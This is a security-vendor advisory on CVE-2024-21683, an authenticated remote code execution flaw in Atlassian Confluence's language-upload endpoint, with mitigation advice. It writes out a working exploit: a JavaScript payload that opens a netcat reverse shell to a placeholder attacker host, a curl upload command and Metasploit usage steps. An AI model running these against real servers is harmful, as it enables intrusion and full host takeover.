Jun 12, 2025
CVE-2024-21683 – Authenticated RCE via “Add a New Language” in Atlassian Confluence
Critical RCE vulnerability (CVE-2024-21683) in Atlassian Confluence Data Center and Server (v5.2–8.9.0) allows authenticated users to execute arbitrary code via malicious code macros.
OffSec Team
CVE-2024-21683 is a critical Remote Code Execution (RCE) vulnerability affecting self-hosted Atlassian Confluence Data Center and Server instances (versions 5.2 through 8.9.0). It allows authenticated attackers with permissions to add code macro languages to upload malicious scripts, resulting in arbitrary code execution on the host system.
- CVE ID: CVE-2024-21683
- Severity: High
- CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 93.98%
- Published: May 21, 2024
- Affected Versions: Confluence Data Center ≤8.9.0; Server ≤8.5.8 LTS / ≤7.19.21 LTS
- Fixed Versions: Data Center ≥ 8.9.1; Server ≥ 8.5.9 LTS or 7.19.22 LTS
The vulnerability stems from inadequate input validation in the “Add a new language” feature accessed via:
POST /admin/plugins/newcode/addlanguage.actionThis endpoint expects a JavaScript language file, which is parsed by the RhinoLanguageParser. However, because the parser enables Java class access within the script, an attacker can inject malicious Java code (e.g., java.lang.Runtime.getRuntime().exec(…)) for RCE
- Must have authenticated access to Confluence with privilege to add new macro languages
- Instance must be on a vulnerable version (≤8.9.0 DC or ≤8.5.8/7.19.21 LTS Server)
- Network access to the Confluence web interface
1. Create exploit.js:
new java.lang.ProcessBuilder["(java.lang.String[])"](
["bash","-c","nc attacker-ip 4444 -e /bin/sh"]
).start();2. Send exploit:
curl -X POST http://target:8090/admin/plugins/newcode/addlanguage.action \
-F "atl_token=<CSRF_TOKEN>" \
-F "languageFile=@exploit.js;filename=exploit.js" \
-F "newLanguageName=evil"Upon upload, the code executes, spawning a reverse shell. POC link: Github
Metasploit Module
Rapid7 released a Metasploit module exploit/multi/http/atlassian_confluence_rce_cve_2024_21683. Here’s the usage flow:
msf > use exploit/multi/http/atlassian_confluence_rce_cve_2024_21683
msf exploit(...) > set RHOSTS 10.10.10.5
msf exploit(...) > set admin_user admin
msf exploit(...) > set admin_pass admin
msf exploit(...) > set payload cmd/linux/http/x86/meterpreter_reverse_https
msf exploit(...) > exploitIf credentials are valid and privileges suffice, the module will upload and execute the malicious script, yielding a shell
- Upgrade Confluence to fixed versions: DC ≥ 8.9.1; Server ≥ 8.5.9 LTS / 7.19.22 LTS
- Restrict “Add language” privileges to trusted admins
- Monitor logs for API calls to /admin/plugins/newcode/addlanguage.action
- Immediate WAF rules: block unauthorized POSTs to this endpoint
Click below to access the CVE-2024-21683 lab in our Learning Library. CVE labs are available with a Learn Enterprise account.
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec
Research & Tutorials
What is Phishing? Introduction to Phishing Demo (for Beginners)
Learn how phishing attacks work and how to spot them. Watch OffSec’s animated video to protect yourself from scams, spoofed sites, and social engineering.
Jul 15, 2025
2 min read
Research & Tutorials
CVE-2025-27636 – Remote Code Execution in Apache Camel via Case-Sensitive Header Filtering Bypass
Discover the critical Apache Camel vulnerability (CVE-2025-27636) that allows remote code execution via case-sensitive HTTP header manipulation in the exec component. Learn how attackers exploit this flaw and how to mitigate it.
Jul 10, 2025
2 min read
Research & Tutorials
CVE-2025-29306 – Unauthenticated Remote Code Execution in FoxCMS v1.2.5 via Unserialize Injection
Discover details about CVE-2025-29306, a critical RCE vulnerability in FoxCMS 1.2.5. Learn how unsafe use of PHP’s unserialize() function enables remote attackers to execute arbitrary system commands.
Jul 3, 2025
2 min read